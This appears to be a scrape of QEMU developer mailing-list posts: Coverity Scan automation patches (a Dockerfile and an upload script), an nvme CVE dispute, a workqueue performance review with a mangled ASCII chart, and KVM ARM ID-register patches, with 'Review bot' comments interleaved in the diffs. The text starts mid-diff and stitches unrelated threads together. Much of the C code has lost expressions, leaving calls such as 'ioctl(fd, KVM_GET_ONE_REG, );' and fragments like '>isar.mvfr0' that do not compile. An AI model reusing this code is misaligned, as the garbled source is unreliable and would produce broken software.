+mingw32-curl \
+mingw32-glib2 \
+mingw32-gmp \
+mingw32-gnutls \
+mingw32-gtk3 \
+mingw32-libjpeg-turbo \
+mingw32-libpng \
+mingw32-libssh2 \
+mingw32-libtasn1 \
+mingw32-nettle \
+mingw32-pixman \
+mingw32-pkg-config \
+mingw32-SDL2 \
+mingw64-bzip2 \
+mingw64-curl \
+mingw64-glib2 \
+mingw64-gmp \
+mingw64-gnutls \
+mingw64-gtk3 \
+mingw64-libjpeg-turbo \
+mingw64-libpng \
+mingw64-libssh2 \
+mingw64-libtasn1 \
+mingw64-nettle \
+mingw64-pixman \
+mingw64-pkg-config \
+mingw64-SDL2 \
+ncurses-devel \
+nettle-devel \
+nss-devel \
+numactl-devel \
+perl \
+pixman-devel \
+pulseaudio-libs-devel \
+python3 \
+PyYAML \
+rdma-core-devel \
+SDL2-devel \
+snappy-devel \
+sparse \
+spice-server-devel \
+systemtap-sdt-devel \
+tar \
+usbredir-devel \
+virglrenderer-devel \
+vte3-devel \
+wget \
+which \
+xen-devel \
+xfsprogs-devel \
+zlib-devel
+ENV QEMU_CONFIGURE_OPTS --python=/usr/bin/python3
+
+RUN dnf install -y $PACKAGES
+RUN rpm -q $PACKAGES | sort > /packages.txt
+ENV COVERITY_TOOL_BASE=/coverity-tools
+COPY run-coverity-scan run-coverity-scan
+RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token
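Review bot: The header comment promises a fixed configuration, but `FROM fedora:28` and the unpinned `dnf install -y $PACKAGES` both float: the `fedora:28` tag and the package versions it resolves can change between builds, so two runs of this Dockerfile may scan with different toolchains and the comment's guarantee only holds for the option list. Pinning the base image by digest, e.g. `FROM fedora:28@sha256:<digest-placeholder>`, and keeping `/packages.txt` as the record of what was actually installed would make the claim true. The `RUN --mount=type=secret` form is the right way to keep the token out of the image layers; the header comment should also say that the build therefore needs BuildKit (Docker 18.09 with `DOCKER_BUILDKIT=1`), which the `# syntax=` line alone does not communicate to someone running a plain `docker build`.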
diff --git a/scripts/coverity-scan/run-coverity-scan 
b/scripts/coverity-scan/run-coverity-scan
index 99495b04501..e89316c090d 100755
--- a/scripts/coverity-scan/run-coverity-scan
+++ b/scripts/coverity-scan/run-coverity-scan
@@ -29,6 +29,7 @@
 
 # Command line options:
 #   --dry-run : run the tools, but don't actually do the upload
+#   --docker : create and work inside a docker container
 #   --update-tools-only : update the cached copy of the tools, but don't run 
them
 #   --tokenfile : file to read Coverity token from
 #   --version ver : specify version being analyzed (default: ask git)
@@ -122,6 +123,7 @@ update_coverity_tools () {
 # Check user-provided environment variables and arguments
 DRYRUN=no
 UPDATE_ONLY=no
+DOCKER=no
 
 while [ "$#" -ge 1 ]; do
 case "$1" in
@@ -169,6 +171,10 @@ while [ "$#" -ge 1 ]; do
 SRCDIR="$1"
 shift
 ;;
+--docker)
+DOCKER=yes
+shift
+;;
 *)
 echo "Unexpected argument '$1'"
 exit 1
@@ -199,6 +205,10 @@ PROJTOKEN="$COVERITY_TOKEN"
 PROJNAME=QEMU
 TARBALL=cov-int.tar.xz
 
+if [ "$UPDATE_ONLY" = yes ] && [ "$DOCKER" = yes ]; then
+echo "Combining --docker and --update-only is not supported"
+exit 1
+fi
 
 if [ "$UPDATE_ONLY" = yes ]; then
 # Just do the tools update; we don't need to check whether
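Review bot: The new error message names an option that the script does not have: the flag documented at the top of the file and used by the Dockerfile is `--update-tools-only`, so a user who trips this check is told to drop `--update-only` and will find no such option. Change the line to `echo "Combining --docker and --update-tools-only is not supported"`. The `case` arm that sets UPDATE_ONLY is outside this hunk, so I have not checked whether the option name there matches as well.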
@@ -229,6 +239,54 @@ if [ -z "$COVERITY_EMAIL" ]; then
 COVERITY_EMAIL="$(git config user.email)"
 fi
 
+# Run ourselves 

[Qemu-devel] [PATCH 0/2] Automation for running Coverity Scan builds

2018-11-13 Thread Peter Maydell
This patchset is an attempt to automate the process of
running a Coverity Scan build and uploading it to the website.
(I had a go at this last year; the scripts here are based
on my older attempt, with some changes.)

Patch 1 is a script which will do a build-and-upload. It
requires that you have a Fedora 28 host with all the relevant
-devel packages installed, and that you run it in a clean directory.

Patch 2 improves on that by using Docker to set up the
build environment, so you can run it on any host and get
the same results, and it doesn't trash your source tree with
an in-place build.

Patch 1 I'm generally pretty happy with. Paolo, if you could
check the configure options against what you use at the moment
for uploads that would be very helpful. These are the set that
you gave me last time I asked, but I think that was long enough
ago that they may be a little out of date.

Patch 2 is a bit more RFC-ish -- it does work and you can do a
complete build-and-upload with it, but I was thrashing about
trying to get Docker to do what I wanted and I'm pretty sure
there are better ways to do it. In particular I was expecting
that once the script has run once and done the "set up F28,
download the coverity tools and unpack them", that a second
run would reuse a cached copy of that image, but the docker
build seems to repeat the download-and-unpack part.
NB that you need the bleeding-edge Docker 18.09 for the --secret
option which lets us pass the coverity magic token into the
build stage safely. Review from people who know Docker welcomed.


I would eventually like to set up Travis so it does the
build-and-upload automatically, but I think getting to a
point where coverity uploads are done with a process that
can be repeated reliably by anybody with maintainer rights
is useful in itself even if we don't want to do it via Travis.

thanks
-- PMM


Peter Maydell (2):
  scripts/run-coverity-scan: Script to run Coverity Scan build
  scripts/coverity-scan: Add Docker support

 MAINTAINERS|   5 +
 scripts/coverity-scan/coverity-scan.docker | 120 +++
 scripts/coverity-scan/run-coverity-scan| 350 +
 3 files changed, 475 insertions(+)
 create mode 100644 scripts/coverity-scan/coverity-scan.docker
 create mode 100755 scripts/coverity-scan/run-coverity-scan

-- 
2.19.1




[Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

2018-11-13 Thread Peter Maydell
Add a new script to automate the process of running the Coverity
Scan build tools and uploading the resulting tarball to the
website.

This is intended eventually to be driven from Travis,
but it can be run locally, if you are a maintainer of the
QEMU project on the Coverity Scan website and have the secret
upload token.

The script must be run directly on a Fedora 28 system.

Signed-off-by: Peter Maydell 
---
 MAINTAINERS |   5 +
 scripts/coverity-scan/run-coverity-scan | 292 
 2 files changed, 297 insertions(+)
 create mode 100755 scripts/coverity-scan/run-coverity-scan

diff --git a/MAINTAINERS b/MAINTAINERS
index 126fe0be7eb..5f107d99061 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -1553,6 +1553,11 @@ M: Markus Armbruster 
 S: Supported
 F: scripts/coverity-model.c
 
+Coverity Scan integration
+M: Peter Maydell 
+S: Maintained
+F: scripts/coverity-scan/
+
 CPU
 L: qemu-devel@nongnu.org
 S: Supported
diff --git a/scripts/coverity-scan/run-coverity-scan 
b/scripts/coverity-scan/run-coverity-scan
new file mode 100755
index 000..99495b04501
--- /dev/null
+++ b/scripts/coverity-scan/run-coverity-scan
@@ -0,0 +1,292 @@
+#!/bin/sh -e
+
+# Upload a created tarball to Coverity Scan, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+
+# This work is licensed under the terms of the GNU GPL version 2,
+# or (at your option) any later version.
+# See the COPYING file in the top-level directory.
+#
+# Copyright (c) 2017, 2018 Linaro Limited
+# Written by Peter Maydell
+
+# Note that this script will automatically download and
+# run the (closed-source) coverity build tools, so don't
+# use it if you don't trust them!
+
+# This script assumes that you're running it from a QEMU source
+# tree, and that tree is a fresh clean one, because we do an in-tree
+# build. (This is necessary so that the filenames that the Coverity
+# Scan server sees are relative paths that match up with the component
+# regular expressions it uses; an out-of-tree build won't work for this.)
+# The host machine should have as many of QEMU's dependencies
+# installed as possible, for maximum coverity coverage.
+
+# To do an upload you need to be a maintainer in the Coverity online
+# service, and you will need to know the "Coverity token", which is a
+# secret 8 digit hex string. You can find that from the web UI in the
+# project settings, if you have maintainer access there.
+
+# Command line options:
+#   --dry-run : run the tools, but don't actually do the upload
+#   --update-tools-only : update the cached copy of the tools, but don't run 
them
+#   --tokenfile : file to read Coverity token from
+#   --version ver : specify version being analyzed (default: ask git)
+#   --description desc : specify description of this version (default: ask git)
+#   --srcdir : QEMU source tree to analyze (default: current working dir)
+#
+# User-specifiable environment variables:
+#  COVERITY_TOKEN -- Coverity token
+#  COVERITY_EMAIL -- the email address to use for uploads (default:
+#looks at your git user.email config)
+#  COVERITY_BUILD_CMD -- make command (default: 'make -j8')
+#  COVERITY_TOOL_BASE -- set to directory to put coverity tools
+#(default: /tmp/coverity-tools)
+#
+# You must specify the token, either by environment variable or by
+# putting it in a file and using --tokenfile. Everything else has
+# a reasonable default if this is run from a git tree.
+
+check_upload_permissions() {
+# Check whether we can do an upload to the server; will exit the script
+# with status 1 if the check failed (usually a bad token);
+# will exit the script with status 0 if the check indicated that we
+# can't upload yet (ie we are at quota)
+# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
+
+echo "Checking upload permissions..."
+
+if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted 
--post-data "token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
+echo "Coverity Scan API access denied: bad token?"
+exit 1
+fi
+
+# Really up_perm is a JSON response with either
+# {upload_permitted:true} or {next_upload_permitted_at:}
+# We do some hacky string parsing instead of properly parsing it.
+case "$up_perm" in
+*upload_permitted*true*)
+echo "Coverity Scan: upload permitted"
+;;
+*next_upload_permitted_at*)
+if [ "$DRYRUN" = yes ]; then
+echo "Coverity Scan: upload quota reached; stopping here"
+# Exit success as this isn't a build error.
+exit 0
+else
+echo "Coverity Scan: upload quota reached, continuing dry run"
+fi
+;;
+*)
+echo "Coverity Scan upload check: unexpected result $up_perm"
+exit 1
+;;
+esac
+}
+
+
+update_coverity_tools () {
+# Check for whether 

Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

2018-11-13 Thread Paolo Bonzini
On 02/11/2018 16:40, Keith Busch wrote:
> Hey, so why is this memory region access even considered valid if the
> request is out of range from what NVMe had registered for its
> MemoryRegion? Wouldn't it be better to not call the mr->ops->read/write
> if it's out of bounds? Otherwise every MemoryRegion needs to duplicate
> the same check, right?

Because some crazy devices have misaligned registers.

But actually this is not a problem because NVMe doesn't set
ops->impl.unaligned to true, so indeed no change is needed.

Paolo

> Would something like the following work (minimally tested)?




Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

2018-11-13 Thread Paolo Bonzini
On 13/11/2018 11:17, Kevin Wolf wrote:
> Am 13.11.2018 um 02:45 hat Li Qiang geschrieben:
> > Ping, what's the status of this patch.
>>
>> I see Kevin's new pr doesn't contain this patch.
> 
> Oh, I thought you said that you wanted to fix this at a higher level so
> that the problem is caught before even getting into nvme code? If you
> don't, I can apply the patch for my next pull request.

As far as I know the bug doesn't exist.  Li Qiang, if you have a
reproducer please send it.

Prasad, please revoke the CVE.

Paolo




Re: [Qemu-devel] [PATCH v2 2/5] util: introduce threaded workqueue

2018-11-13 Thread Emilio G. Cota
On Tue, Nov 06, 2018 at 20:20:22 +0800, guangrong.x...@gmail.com wrote:
> From: Xiao Guangrong 
> 
> This module implements the lockless and efficient threaded workqueue.
(snip)
> +++ b/util/threaded-workqueue.c
> +struct Threads {
> +/*
> + * in order to avoid contention, the @requests is partitioned to
> + * @threads_nr pieces, each thread exclusively handles
> + * @thread_request_nr requests in the array.
> + */
> +void *requests;
(snip)
> +/*
> + * the bit in these two bitmaps indicates the index of the @requests
> + * respectively. If it's the same, the corresponding request is free
> + * and owned by the user, i.e, where the user fills a request. Otherwise,
> + * it is valid and owned by the thread, i.e, where the thread fetches
> + * the request and write the result.
> + */
> +
> +/* after the user fills the request, the bit is flipped. */
> +unsigned long *request_fill_bitmap;
> +/* after handles the request, the thread flips the bit. */
> +unsigned long *request_done_bitmap;
(snip)
> +/* the request is pushed to the thread with round-robin manner */
> +unsigned int current_thread_index;
(snip)
> +QemuEvent ev;
(snip)
> +};

The fields I'm showing above are all shared by all worker threads.
This can lead to unnecessary contention. For example:
- Adjacent requests can share the same cache line, which might be
  written to by different worker threads (when setting request->done)

- The request_done bitmap is written to by worker threads every time
  a job completes. At high core counts with low numbers of job slots,
  this can result in high contention. For example, imagine we have
  16 threads with 4 jobs each. This only requires 64 bits == 8 bytes, i.e.
  much less than a cache line. Whenever a job completes, the cache line
  will be atomically updated by one of the 16 threads.

- The completion event (Threads.ev above) is written to by every thread.
  Again, this can result in contention at large core counts.

An orthogonal issue is the round-robin policy. This can give us fairness,
in that we guarantee that all workers get a similar number of jobs.
But giving one job at a time to each worker is suboptimal when the job
sizes are small-ish, because it misses out on the benefits of batching,
which amortize the cost of communication.
Given that the number of jobs that we have (at least in the benchmark)
are small, filling up a worker's queue before moving on to the next
can yield a significant speedup at high core counts.

I implemented the above on top of your series. The results are as follows:

 threaded-workqueue-bench -r 4 -m 2 -c 
20 -t #N
  Host: AMD Opteron(tm) Processor 
6376
  Thread pinning: #N+1 cores, 
same-socket first

 12 
+---+
|+   + + + + +A+ + + + +
 + + + + + +|
| $ 
 before ***B*** |
 10 |-+  $$ 
  +batching ###D###-|
|$$ 
  +per-thread-state $$$A$$$ |
|$$  AA 
|
| $AD D$A $A $ $ $A  A   $$   A 
   A  A$   AA$ A|
  8 |-+   D$AA  A# D$AA# A  $#D$$  $ $$ A  $   $A $A  
$$ A$ A$A $ $ AA   $A $  $A   $ A   +-|
|AA  B* B$DA D  DD# A #$$   A  A   $$AA  A  A$A  $  
A  A A$ AAA  A$A|
|   $DB*B  B $ $ BBD   $$  #D #D   A   A$A  
   A|
  6 |-+  $AA*B   *A *  *   $# D  D  D#  #D #D   D#
D#DD#D   D# D#  # ##D  D#   +-|
|   A BB   *   A DDD  D  D#D  DD#D  
D#D  D  DD  D  D# D#D  DD#DD|
|   $   B   
 D  |
| $A **BB B 
|
  4 |-+  A#  B   ***
  +-|
|$B *B  BB* B*  
  *BB*B   B*BB*BB*B  B *BB* B*BB|
|  $A  B   B  
BB*BB*BB*BB*BB*BB*BB **B ** BB|
  2 |-+   A 
  

[Qemu-devel] [PATCH v5 0/4] target/arm: KVM vs ARMISARegisters

2018-11-13 Thread Richard Henderson
Facepalm.  I managed to not push the v3 changes anywhere,
so the v4 changes were done on top of v2.  Ho hum.

r~


Richard Henderson (4):
  target/arm: Install ARMISARegisters from kvm host
  target/arm: Fill in ARMISARegisters for kvm64
  target/arm: Introduce read_sys_reg32 for kvm32
  target/arm: Fill in ARMISARegisters for kvm32

 target/arm/kvm_arm.h |  1 +
 target/arm/kvm.c |  1 +
 target/arm/kvm32.c   | 77 +++--
 target/arm/kvm64.c   | 90 +++-
 4 files changed, 139 insertions(+), 30 deletions(-)

-- 
2.17.2




[Qemu-devel] [PATCH v5 1/4] target/arm: Install ARMISARegisters from kvm host

2018-11-13 Thread Richard Henderson
The ID registers are replacing (some of) the feature bits.
We need (some of) these values to determine the set of data
to be handled during migration.

Signed-off-by: Richard Henderson 
---
 target/arm/kvm_arm.h | 1 +
 target/arm/kvm.c | 1 +
 2 files changed, 2 insertions(+)

diff --git a/target/arm/kvm_arm.h b/target/arm/kvm_arm.h
index 21c0129da2..6393455b1d 100644
--- a/target/arm/kvm_arm.h
+++ b/target/arm/kvm_arm.h
@@ -183,6 +183,7 @@ void kvm_arm_destroy_scratch_host_vcpu(int *fdarray);
  * by asking the host kernel)
  */
 typedef struct ARMHostCPUFeatures {
+ARMISARegisters isar;
 uint64_t features;
 uint32_t target;
 const char *dtb_compatible;
diff --git a/target/arm/kvm.c b/target/arm/kvm.c
index 09a86e2820..44dd0ce6ce 100644
--- a/target/arm/kvm.c
+++ b/target/arm/kvm.c
@@ -158,6 +158,7 @@ void kvm_arm_set_cpu_features_from_host(ARMCPU *cpu)
 
 cpu->kvm_target = arm_host_cpu_features.target;
 cpu->dtb_compatible = arm_host_cpu_features.dtb_compatible;
+cpu->isar = arm_host_cpu_features.isar;
 env->features = arm_host_cpu_features.features;
 }
 
-- 
2.17.2




Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Philippe Mathieu-Daudé

On 13/11/18 18:01, Peter Maydell wrote:

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
  target/arm/helper.c | 3 ---
  1 file changed, 3 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 3d4e9c5c8a..27d9285e1e 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -12,13 +12,10 @@
  #include "internals.h"
  #include "exec/gdbstub.h"
  #include "exec/helper-proto.h"
-#include "qemu/host-utils.h"


This is for muldiv64().


But it is already included by "cpu.h" -> "exec/cpu-defs.h"




  #include "sysemu/arch_init.h"
  #include "sysemu/sysemu.h"
-#include "qemu/bitops.h"


"cpu.h" -> "cpu-qom.h" -> "qom/cpu.h" -> "qemu/bitmap.h"



This is for extract32() and friends.


  #include "qemu/crc32c.h"
  #include "exec/exec-all.h"
-#include "exec/cpu_ldst.h"


This is for cpu_stl_data().


Included by "arm_ldst.h"




  #include "arm_ldst.h"
  #include  /* For crc32 */
  #include "exec/semihost.h"


So they are not "unused" but "unnecessary".

I thought it would be better to clean this up once, before Samuel's split.

Samuel: please drop this patch from your series.

Thanks,

Phil.



[Qemu-devel] [PATCH v5 2/4] target/arm: Fill in ARMISARegisters for kvm64

2018-11-13 Thread Richard Henderson
Signed-off-by: Richard Henderson 
---
 target/arm/kvm64.c | 90 --
 1 file changed, 88 insertions(+), 2 deletions(-)

diff --git a/target/arm/kvm64.c b/target/arm/kvm64.c
index 46fbe6d8ff..0a502091e7 100644
--- a/target/arm/kvm64.c
+++ b/target/arm/kvm64.c
@@ -456,17 +456,40 @@ static inline void unset_feature(uint64_t *features, int 
feature)
 *features &= ~(1ULL << feature);
 }
 
+static int read_sys_reg32(int fd, uint32_t *pret, uint64_t id)
+{
+uint64_t ret;
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t) };
+int err;
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U64);
+err = ioctl(fd, KVM_GET_ONE_REG, );
+if (err < 0) {
+return -1;
+}
+*pret = ret;
+return 0;
+}
+
+static int read_sys_reg64(int fd, uint64_t *pret, uint64_t id)
+{
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t)pret };
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U64);
+return ioctl(fd, KVM_GET_ONE_REG, );
+}
+
 bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 {
 /* Identify the feature bits corresponding to the host CPU, and
  * fill out the ARMHostCPUClass fields accordingly. To do this
  * we have to create a scratch VM, create a single CPU inside it,
  * and then query that CPU for the relevant ID registers.
- * For AArch64 we currently don't care about ID registers at
- * all; we just want to know the CPU type.
  */
 int fdarray[3];
 uint64_t features = 0;
+int err;
+
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
  * we know these will only support creating one kind of guest CPU,
  * which is its preferred CPU type. Fortunately these old kernels
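Review bot: `*pret = ret;` in read_sys_reg32 silently narrows the 64-bit register value to 32 bits, and nothing in the helper records that this is intended. The caller uses it for the AArch32 ID registers read through their AArch64 (U64) encodings, where the upper half is presumably RES0, but a reader of this helper alone cannot tell a deliberate truncation from a bug. A one-line comment above the assignment such as `/* AArch32 ID regs are exposed as 64-bit by KVM; only the low half carries data */`, plus a short header comment on both helpers stating what they return on failure, would make the contract explicit. Note that read_sys_reg32 normalises failures to -1 while read_sys_reg64 returns the raw ioctl result; the callers only test `err < 0`, so this is harmless, but the two helpers could share one convention.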
@@ -487,8 +510,71 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures 
*ahcf)
 ahcf->target = init.target;
 ahcf->dtb_compatible = "arm,arm-v8";
 
+err = read_sys_reg64(fdarray[2], >isar.id_aa64pfr0,
+ ARM64_SYS_REG(3, 0, 0, 4, 0));
+if (unlikely(err < 0)) {
+/*
+ * Before v4.15, the kernel only exposed a limited number of system
+ * registers, not including any of the interesting AArch64 ID regs.
+ * For the most part we could leave these fields as zero with minimal
+ * effect, since this does not affect the values seen by the guest.
+ *
+ * However, it could cause problems down the line for QEMU,
+ * so provide a minimal v8.0 default.
+ *
+ * ??? Could read MIDR and use knowledge from cpu64.c.
+ * ??? Could map a page of memory into our temp guest and
+ * run the tiniest of hand-crafted kernels to extract
+ * the values seen by the guest.
+ * ??? Either of these sounds like too much effort just
+ * to work around running a modern host kernel.
+ */
+ahcf->isar.id_aa64pfr0 = 0x0011; /* EL1&0, AArch64 only */
+err = 0;
+} else {
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64pfr1,
+  ARM64_SYS_REG(3, 0, 0, 4, 1));
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64isar0,
+  ARM64_SYS_REG(3, 0, 0, 6, 0));
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64isar1,
+  ARM64_SYS_REG(3, 0, 0, 6, 1));
+
+/*
+ * Note that if AArch32 support is not present in the host,
+ * the AArch32 sysregs are present to be read, but will
+ * return UNKNOWN values.  This is neither better nor worse
+ * than skipping the reads and leaving 0, as we must avoid
+ * considering the values in every case.
+ */
+err |= read_sys_reg32(fdarray[2], >isar.id_isar0,
+  ARM64_SYS_REG(3, 0, 0, 2, 0));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar1,
+  ARM64_SYS_REG(3, 0, 0, 2, 1));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar2,
+  ARM64_SYS_REG(3, 0, 0, 2, 2));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar3,
+  ARM64_SYS_REG(3, 0, 0, 2, 3));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar4,
+  ARM64_SYS_REG(3, 0, 0, 2, 4));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar5,
+  ARM64_SYS_REG(3, 0, 0, 2, 5));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar6,
+  ARM64_SYS_REG(3, 0, 0, 2, 7));
+
+err |= read_sys_reg32(fdarray[2], >isar.mvfr0,
+  ARM64_SYS_REG(3, 0, 0, 3, 0));
+err |= read_sys_reg32(fdarray[2], >isar.mvfr1,
+  ARM64_SYS_REG(3, 0, 0, 3, 1));
+err |= read_sys_reg32(fdarray[2], >isar.mvfr2,
+  ARM64_SYS_REG(3, 0, 0, 3, 2));
+}
+
 

[Qemu-devel] [PATCH v5 3/4] target/arm: Introduce read_sys_reg32 for kvm32

2018-11-13 Thread Richard Henderson
Assert that the value to be written is the correct size.
No change in functionality here, just mirroring the same
function from kvm64.

Signed-off-by: Richard Henderson 
---
 target/arm/kvm32.c | 41 -
 1 file changed, 16 insertions(+), 25 deletions(-)

diff --git a/target/arm/kvm32.c b/target/arm/kvm32.c
index cb3fb73a96..bc0badf53d 100644
--- a/target/arm/kvm32.c
+++ b/target/arm/kvm32.c
@@ -28,6 +28,14 @@ static inline void set_feature(uint64_t *features, int 
feature)
 *features |= 1ULL << feature;
 }
 
+static int read_sys_reg32(int fd, uint32_t *pret, uint64_t id)
+{
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t)pret };
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U32);
+return ioctl(fd, KVM_GET_ONE_REG, );
+}
+
 bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 {
 /* Identify the feature bits corresponding to the host CPU, and
@@ -35,9 +43,10 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  * we have to create a scratch VM, create a single CPU inside it,
  * and then query that CPU for the relevant ID registers.
  */
-int i, ret, fdarray[3];
+int err = 0, fdarray[3];
 uint32_t midr, id_pfr0, mvfr1;
 uint64_t features = 0;
+
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
  * we know these will only support creating one kind of guest CPU,
  * which is its preferred CPU type.
@@ -47,23 +56,6 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 QEMU_KVM_ARM_TARGET_NONE
 };
 struct kvm_vcpu_init init;
-struct kvm_one_reg idregs[] = {
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| ENCODE_CP_REG(15, 0, 0, 0, 0, 0, 0),
-.addr = (uintptr_t),
-},
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| ENCODE_CP_REG(15, 0, 0, 0, 1, 0, 0),
-.addr = (uintptr_t)_pfr0,
-},
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1,
-.addr = (uintptr_t),
-},
-};
 
 if (!kvm_arm_create_scratch_host_vcpu(cpus_to_try, fdarray, )) {
 return false;
@@ -77,16 +69,15 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  */
 ahcf->dtb_compatible = "arm,arm-v7";
 
-for (i = 0; i < ARRAY_SIZE(idregs); i++) {
-ret = ioctl(fdarray[2], KVM_GET_ONE_REG, [i]);
-if (ret) {
-break;
-}
-}
+err |= read_sys_reg32(fdarray[2], , ARM_CP15_REG32(0, 0, 0, 0));
+err |= read_sys_reg32(fdarray[2], _pfr0, ARM_CP15_REG32(0, 0, 1, 0));
+err |= read_sys_reg32(fdarray[2], ,
+  KVM_REG_ARM | KVM_REG_SIZE_U32 |
+  KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1);
 
 kvm_arm_destroy_scratch_host_vcpu(fdarray);
 
-if (ret) {
+if (err < 0) {
 return false;
 }
 
-- 
2.17.2




[Qemu-devel] [PATCH v5 4/4] target/arm: Fill in ARMISARegisters for kvm32

2018-11-13 Thread Richard Henderson
Signed-off-by: Richard Henderson 
---
 target/arm/kvm32.c | 40 +++-
 1 file changed, 35 insertions(+), 5 deletions(-)

diff --git a/target/arm/kvm32.c b/target/arm/kvm32.c
index bc0badf53d..bd51eb43c8 100644
--- a/target/arm/kvm32.c
+++ b/target/arm/kvm32.c
@@ -44,7 +44,7 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  * and then query that CPU for the relevant ID registers.
  */
 int err = 0, fdarray[3];
-uint32_t midr, id_pfr0, mvfr1;
+uint32_t midr, id_pfr0;
 uint64_t features = 0;
 
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
@@ -71,9 +71,39 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 
 err |= read_sys_reg32(fdarray[2], , ARM_CP15_REG32(0, 0, 0, 0));
 err |= read_sys_reg32(fdarray[2], _pfr0, ARM_CP15_REG32(0, 0, 1, 0));
-err |= read_sys_reg32(fdarray[2], ,
+
+err |= read_sys_reg32(fdarray[2], >isar.id_isar0,
+  ARM_CP15_REG32(0, 0, 2, 0));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar1,
+  ARM_CP15_REG32(0, 0, 2, 1));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar2,
+  ARM_CP15_REG32(0, 0, 2, 2));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar3,
+  ARM_CP15_REG32(0, 0, 2, 3));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar4,
+  ARM_CP15_REG32(0, 0, 2, 4));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar5,
+  ARM_CP15_REG32(0, 0, 2, 5));
+if (read_sys_reg32(fdarray[2], >isar.id_isar6,
+   ARM_CP15_REG32(0, 0, 2, 7))) {
+/*
+ * Older kernels don't support reading ID_ISAR6. This register was
+ * only introduced in ARMv8, so we can assume that it is zero on a
+ * CPU that a kernel this old is running on.
+ */
+ahcf->isar.id_isar6 = 0;
+}
+
+err |= read_sys_reg32(fdarray[2], >isar.mvfr0,
+  KVM_REG_ARM | KVM_REG_SIZE_U32 |
+  KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR0);
+err |= read_sys_reg32(fdarray[2], >isar.mvfr1,
   KVM_REG_ARM | KVM_REG_SIZE_U32 |
   KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1);
+/*
+ * FIXME: There is not yet a way to read MVFR2.
+ * Fortunately there is not yet anything in there that affects migration.
+ */
 
 kvm_arm_destroy_scratch_host_vcpu(fdarray);
 
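Review bot: `ahcf->isar.mvfr2` is never assigned in this hunk: mvfr0 and mvfr1 are read into `ahcf->isar`, but the FIXME for MVFR2 leaves that field holding whatever the caller put there, which is indeterminate unless `ahcf` is zero-initialised somewhere not visible here. Suggest making the fallback explicit next to the FIXME, `ahcf->isar.mvfr2 = 0;`, so the host-CPU model does not depend on the caller's initialisation. The id_isar6 fallback also treats every failed KVM_GET_ONE_REG as "old kernel"; if genuine errors should stay visible, check `errno == ENOENT` before zeroing and otherwise fold the result into `err` — presumably ENOENT is what KVM returns for an unknown register id, worth confirming. kvm_arm_get_host_cpu_features continues past the end of the hunk.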
@@ -95,13 +125,13 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures 
*ahcf)
 if (extract32(id_pfr0, 12, 4) == 1) {
 set_feature(, ARM_FEATURE_THUMB2EE);
 }
-if (extract32(mvfr1, 20, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 20, 4) == 1) {
 set_feature(, ARM_FEATURE_VFP_FP16);
 }
-if (extract32(mvfr1, 12, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 12, 4) == 1) {
 set_feature(, ARM_FEATURE_NEON);
 }
-if (extract32(mvfr1, 28, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 28, 4) == 1) {
 /* FMAC support implies VFPv4 */
 set_feature(, ARM_FEATURE_VFP4);
 }
-- 
2.17.2




Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Peter Maydell
